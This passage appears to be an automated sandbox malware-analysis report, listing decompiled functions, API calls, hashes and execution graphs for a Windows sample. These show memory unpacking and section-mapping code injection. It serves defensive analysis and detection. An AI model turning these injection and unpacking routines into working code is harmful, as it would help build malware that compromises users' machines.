                                                          • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                                                          • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                                                          • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00714147 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 714147-714160 359 714162-714164 358->359 360 714166 359->360 361 71416b-714177 CreateToolhelp32Snapshot 359->361 360->361 362 714187-714194 Module32First 361->362 363 714179-71417f 361->363 364 714196-714197 call 713e06 362->364 365 71419d-7141a5 362->365 363->362 368 714181-714185 363->368 369 71419c 364->369 368->359 368->362 369->365
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071416F
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 0071418F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3833638111-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: bd8b681950721d90c0ca9bf564cb958d5b278c0403dfa175dcbbb0608e42e01a
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: 33F0CD36200719BBD7203BF8AC8DBAB76ECAF58324F100528E642910C0DAB8E8C54A61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 006D003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 6d003c-6d0047 1 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 0->1 2 6d0049 0->2 17 6d028b-6d0292 1->17 18 6d0265-6d0289 call 6d0a69 1->18 2->1 20 6d02a1-6d02b0 17->20 22 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 18->22 20->22 23 6d02b2-6d02cc 20->23 29 6d03d1-6d03e0 22->29 23->20 30 6d0439-6d04b8 VirtualFree 29->30 31 6d03e2-6d0437 call 6d0ce7 29->31 33 6d04be-6d04cd 30->33 34 6d05f4-6d05fe 30->34 31->29 36 6d04d3-6d04dd 33->36 37 6d077f-6d0789 34->37 38 6d0604-6d060d 34->38 36->34 40 6d04e3-6d0505 36->40 41 6d078b-6d07a3 37->41 42 6d07a6-6d07b0 37->42 38->37 43 6d0613-6d0637 38->43 51 6d0517-6d0520 40->51 52 6d0507-6d0515 40->52 41->42 44 6d086e-6d08be LoadLibraryA 42->44 45 6d07b6-6d07cb 42->45 46 6d063e-6d0648 43->46 50 6d08c7-6d08f9 44->50 48 6d07d2-6d07d5 45->48 46->37 49 6d064e-6d065a 46->49 53 6d0824-6d0833 48->53 54 6d07d7-6d07e0 48->54 49->37 55 6d0660-6d066a 49->55 56 6d08fb-6d0901 50->56 57 6d0902-6d091d 50->57 58 6d0526-6d0547 51->58 52->58 62 6d0839-6d083c 53->62 59 6d07e4-6d0822 54->59 60 6d07e2 54->60 61 6d067a-6d0689 55->61 56->57 63 6d054d-6d0550 58->63 59->48 60->53 64 6d068f-6d06b2 61->64 65 6d0750-6d077a 61->65 62->44 66 6d083e-6d0847 62->66 72 6d0556-6d056b 63->72 73 6d05e0-6d05ef 63->73 67 6d06ef-6d06fc 64->67 68 6d06b4-6d06ed 64->68 65->46 69 6d0849 66->69 70 6d084b-6d086c 66->70 74 6d06fe-6d0748 67->74 75 6d074b 67->75 68->67 69->44 70->62 76 6d056d 72->76 77 6d056f-6d057a 72->77 73->36 74->75 75->61 76->73 80 6d057c-6d0599 77->80 81 6d059b-6d05bb 77->81 84 6d05bd-6d05db 80->84 81->84 84->63
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 006D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 371 6d0e0f-6d0e24 SetErrorMode * 2 372 6d0e2b-6d0e2c 371->372 373 6d0e26 371->373 373->372
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 401869-4018bd call 40119e Sleep call 4013d8 385 4018cc-401907 call 40119e 374->385 386 4018bf-4018c7 call 4014a8 374->386 386->385
                                                          C-Code - Quality: 62%
                                                          			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				signed char _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t24 = __eflags;
				_push(0x18a0);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L0040119E(_t8, 0x63, _t20, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
				_t25 = _t11;
				if(_t11 != 0) {
					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t22;
				return L0040119E(_t13, 0x63, _t20, _t25);
			}














                                                          0x00401869
                                                          0x00401877
                                                          0x0040187c
                                                          0x0040187f
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                                                          • Opcode Fuzzy Hash: 0e3b0a6706bab068868f47a51e5f7c8c9e7b56fc4d9aa96bcc056c135368eafa
                                                          • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00713E06 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 397 713e06-713e40 call 714119 400 713e42-713e75 VirtualAlloc call 713e93 397->400 401 713e8e 397->401 403 713e7a-713e8c 400->403 401->401 403->401
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00713E57
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: bb95685b5f3da37770b211d6aedd59c5d8c1ced81a7c08a3d14be0477cabcd4b
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: FF113F79A00208EFDB01DF98C985E99BBF5AF08750F058094F9489B361D375EA90DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040188B Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 404 40188b-4018bd call 40119e Sleep call 4013d8 411 4018cc-401907 call 40119e 404->411 412 4018bf-4018c7 call 4014a8 404->412 412->411
                                                          C-Code - Quality: 62%
                                                          			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t13;
				intOrPtr _t15;
				intOrPtr* _t19;
				signed char _t24;
				void* _t28;
				intOrPtr* _t30;

				_t33 = __eflags;
				_t25 = __edi;
				asm("out 0xdc, al");
				_t24 = __eax;
				L0040119E(__edx, 0x63, __edi, __eflags);
				_t19 =  *((intOrPtr*)(_t28 + 8));
				Sleep(0x1388);
				_t13 = E004013D8(_t24, _t33, _t19,  *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)(_t28 + 0x10)), _t28 - 4); // executed
				_t34 = _t13;
				if(_t13 != 0) {
					E004014A8(_t34, _t19, _t13,  *((intOrPtr*)(_t28 - 4)),  *((intOrPtr*)(_t28 + 0x14))); // executed
				}
				 *_t19(0xffffffff, 0);
				_push(0x18a0);
				_t15 =  *_t30;
				return L0040119E(_t15, 0x63, _t25, _t34);
			}









                                                          0x0040188b
                                                          0x0040188b
                                                          0x0040188b
                                                          0x0040188e
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction ID: a729e010e1eaefc24d003010d97dd2b43a4c6b95cafc309fd02eabc3c929d3cf
                                                          • Opcode Fuzzy Hash: b2204d64e98a2de913c841e3b248d85559c76b61fbb623d473913d92bf580395
                                                          • Instruction Fuzzy Hash: 7AF04F37704205EBDB00BA95DC81A6E3769DF44315F20803BB612B91F1C63D8B12A76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040189A Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 423 40189a-4018bd call 40119e Sleep call 4013d8 429 4018cc-401907 call 40119e 423->429 430 4018bf-4018c7 call 4014a8 423->430 430->429
                                                          C-Code - Quality: 61%
                                                          			E0040189A(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t17;
				signed char _t21;
				void* _t25;
				intOrPtr* _t27;

				_t30 = __eflags;
				_t22 = __edi;
				_pop(ds);
				L0040119E(_t8, __ecx, __edi, __eflags);
				_t17 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t11 = E004013D8(_t21, _t30, _t17,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				_t31 = _t11;
				if(_t11 != 0) {
					E004014A8(_t31, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t27;
				return L0040119E(_t13, 0x63, _t22, _t31);
			}










                                                          0x0040189a
                                                          0x0040189a
                                                          0x0040189a
                                                          0x0040189b
                                                          0x004018a0
                                                          0x004018a8
                                                          0x004018b6
                                                          0x004018bb
                                                          0x004018bd
                                                          0x004018c7
                                                          0x004018c7
                                                          0x004018d0
                                                          0x004018d9
                                                          0x004018de
                                                          0x00401907

                                                          APIs
                                                          • Sleep.KERNELBASE(00001388), ref: 004018A8
                                                            • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                            • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                            • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                          • String ID:
                                                          • API String ID: 1885482327-0
                                                          • Opcode ID: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction ID: fa21e6fe5ec55b494b8a61ead8be6eb3dfa9bfc2d8f44280934193d3a60a32fd
                                                          • Opcode Fuzzy Hash: acd5664999f289340f50b25abb29b7ad2467a3a024473d975d06bf1365dd1af9
                                                          • Instruction Fuzzy Hash: B3F01D37604205EBDB00BA95DC819AE3769AF04315F20843BBA12B90E1C6398B12A72B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 006D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction ID: 02a7c1c9479bda2ee6bb9274ee97bbc21b000f9cf9760b50e26de53d043e0b6c
                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction Fuzzy Hash: 1E3117B6900609DFEB10CF99C880BAEBBF6FF48324F25504AD441AB351D771EA45CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004013E3 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                                                          • Instruction ID: 653d4cf6b362dfff8c83f4e52f89d4d6250ec1a3e5e41aeb24e209779b57a096
                                                          • Opcode Fuzzy Hash: 681948f4b44aad910003ea51e67e7b20d06f6bcaff8d8bd52ab243d27cab3719
                                                          • Instruction Fuzzy Hash: 9111EF7556852491C7054F7848418B93750EB81B22B244F7FD6667F9F7D53E4C0B018E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004013F6 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                                                          • Instruction ID: 2bf5da122e206d8ddea150ce4759aa9c6fef35af7899c6b3136442ef59938823
                                                          • Opcode Fuzzy Hash: 3e9c0b18502b7877294d0637dd51c8d88a75d9fefc69f981c69ac4f91e035b6e
                                                          • Instruction Fuzzy Hash: FE01C93912982481C7164FB488418B93B50EB81B227648F7FC2267F9F7C93E480B018D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004013FE Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                                                          • Instruction ID: 175fb33aec9134541b5c724c5eedd2ecf262b4b3a324df48efc7d2c36117c159
                                                          • Opcode Fuzzy Hash: 56e4338ff2a01af046ba09faa78791089a11defd98368a97d240bb0c019029fc
                                                          • Instruction Fuzzy Hash: 6801BD7956991540C7154FB448408EA3B50EB92B327648FBFC1657F5F7CA7B480F4188
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401407 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                                                          • Instruction ID: 0fc6c2734a9ed7443d23c078d571d2afc40337617d3eeb8826db586896f955e1
                                                          • Opcode Fuzzy Hash: 02871fd24046ce741f2c7ac25ca5dd483e841f235b0f7f0e7175559287c1a96c
                                                          • Instruction Fuzzy Hash: 4501DC7956996541CB155FB848408EA3B50EB82B323584F7FC1657F9FBCA3A4C0E0188
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00713A24 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.378115658.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_70d000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                          • Instruction ID: f8d9ad5a1a00b75645eafcf99a1c5406377bb19c711e67cbc8dee0f12b9cbff9
                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                          • Instruction Fuzzy Hash: 43111872340100AFD754DE59DC81EA673AAEB89720B298069E948CB356E679E9428660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 006D0D90 Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377931362.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6d0000_file.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                          • Instruction ID: 7b34b00db03c437a671a5b77b6dbaefec700ec5df5ee9cfbb4f3523ba37fa3a2
                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                          • Instruction Fuzzy Hash: 5501A776E006048FEF21CF64C804BEA33F7EF85315F4544EAD50697342E774A9418B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040D3F8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377699254.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_409000_file.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction ID: 0919a159efc3dc78a400a241d7d35c155fcddafca829aeb5adc2301147472416
                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                          • Instruction Fuzzy Hash: A811803284014EBBCF165FD4CC51CEE3F22FB59354B58842AFE1869171C23AD9B5AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:5.2%
                                                          Dynamic/Decrypted Code Coverage:67.3%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:159
                                                          Total number of Limit Nodes:10
                                                          execution_graph 5121 409e62 5122 409e74 _malloc 5121->5122 5124 409f01 5121->5124 5123 409ed1 RtlAllocateHeap 5122->5123 5122->5124 5123->5122 5125 402b02 5127 402b0b 5125->5127 5126 402bdc 5127->5126 5129 401869 5127->5129 5130 401877 5129->5130 5131 4018a0 Sleep 5130->5131 5136 4013d8 5131->5136 5133 4018bb 5135 4018cc 5133->5135 5148 4014a8 5133->5148 5135->5126 5137 4013df 5136->5137 5138 401547 NtDuplicateObject 5137->5138 5147 4013b1 5137->5147 5139 401564 NtCreateSection 5138->5139 5138->5147 5140 4015e4 NtCreateSection 5139->5140 5141 40158a NtMapViewOfSection 5139->5141 5143 401610 5140->5143 5140->5147 5141->5140 5142 4015ad NtMapViewOfSection 5141->5142 5142->5140 5144 4015cb 5142->5144 5145 40161a NtMapViewOfSection 5143->5145 5143->5147 5144->5140 5146 401641 NtMapViewOfSection 5145->5146 5145->5147 5146->5147 5147->5133 5149 4014b7 5148->5149 5150 401547 NtDuplicateObject 5149->5150 5151 401663 5149->5151 5150->5151 5152 401564 NtCreateSection 5150->5152 5151->5135 5153 4015e4 NtCreateSection 5152->5153 5154 40158a NtMapViewOfSection 5152->5154 5153->5151 5156 401610 5153->5156 5154->5153 5155 4015ad NtMapViewOfSection 5154->5155 5155->5153 5157 4015cb 5155->5157 5156->5151 5158 40161a NtMapViewOfSection 5156->5158 5157->5153 5158->5151 5159 401641 NtMapViewOfSection 5158->5159 5159->5151 5198 470005 5203 47092b GetPEB 5198->5203 5200 470030 5205 47003c 5200->5205 5204 470972 5203->5204 5204->5200 5206 470049 5205->5206 5207 470e0f 2 API calls 5206->5207 5208 470223 5207->5208 5209 470d90 GetPEB 5208->5209 5210 470238 VirtualAlloc 5209->5210 5211 470265 5210->5211 5212 4702ce VirtualProtect 5211->5212 5214 47030b 5212->5214 5213 470439 VirtualFree 5217 4704be LoadLibraryA 5213->5217 5214->5213 5216 4708c7 5217->5216 5344 4013e3 5345 4013df 5344->5345 5346 401547 NtDuplicateObject 5345->5346 5355 4013b1 5345->5355 5347 401564 NtCreateSection 5346->5347 5346->5355 5348 4015e4 NtCreateSection 5347->5348 5349 40158a NtMapViewOfSection 5347->5349 5351 401610 5348->5351 5348->5355 5349->5348 5350 4015ad NtMapViewOfSection 5349->5350 5350->5348 5352 4015cb 5350->5352 5353 40161a NtMapViewOfSection 5351->5353 5351->5355 5352->5348 5354 401641 NtMapViewOfSection 5353->5354 5353->5355 5354->5355 5218 470001 5219 470005 5218->5219 5220 47092b GetPEB 5219->5220 5221 470030 5220->5221 5222 47003c 7 API calls 5221->5222 5223 470038 5222->5223 5278 402aa7 5281 4029c0 5278->5281 5279 402ab3 5280 401869 15 API calls 5280->5279 5281->5279 5281->5280 5179 40ba69 5180 40ba7c 5179->5180 5183 40b8af 5180->5183 5182 40ba99 5184 40b8d0 5183->5184 5185 40b9e2 ___ansicp 5184->5185 5187 40b8e8 5184->5187 5189 40b976 _memset __crtLCMapStringA_stat __freea 5185->5189 5194 40e454 5185->5194 5187->5189 5190 409e62 5187->5190 5189->5182 5191 409e74 _malloc 5190->5191 5193 409f01 5190->5193 5192 409ed1 RtlAllocateHeap 5191->5192 5191->5193 5192->5191 5193->5189 5195 40e494 5194->5195 5197 40e4f6 _memset __crtLCMapStringA_stat __freea 5194->5197 5196 409e62 _malloc RtlAllocateHeap 5195->5196 5195->5197 5196->5197 5197->5189 5264 40188b 5265 40188f 5264->5265 5266 4018a0 Sleep 5265->5266 5267 4013d8 7 API calls 5266->5267 5268 4018bb 5267->5268 5269 4014a8 7 API calls 5268->5269 5270 4018cc 5268->5270 5269->5270 5340 409f2c 5341 409f38 5340->5341 5342 409e62 _malloc RtlAllocateHeap 5341->5342 5343 409f47 6 library calls 5341->5343 5342->5343 5236 402ace 5237 402a74 5236->5237 5237->5236 5238 401869 15 API calls 5237->5238 5239 402abf 5237->5239 5238->5239 5282 4014b3 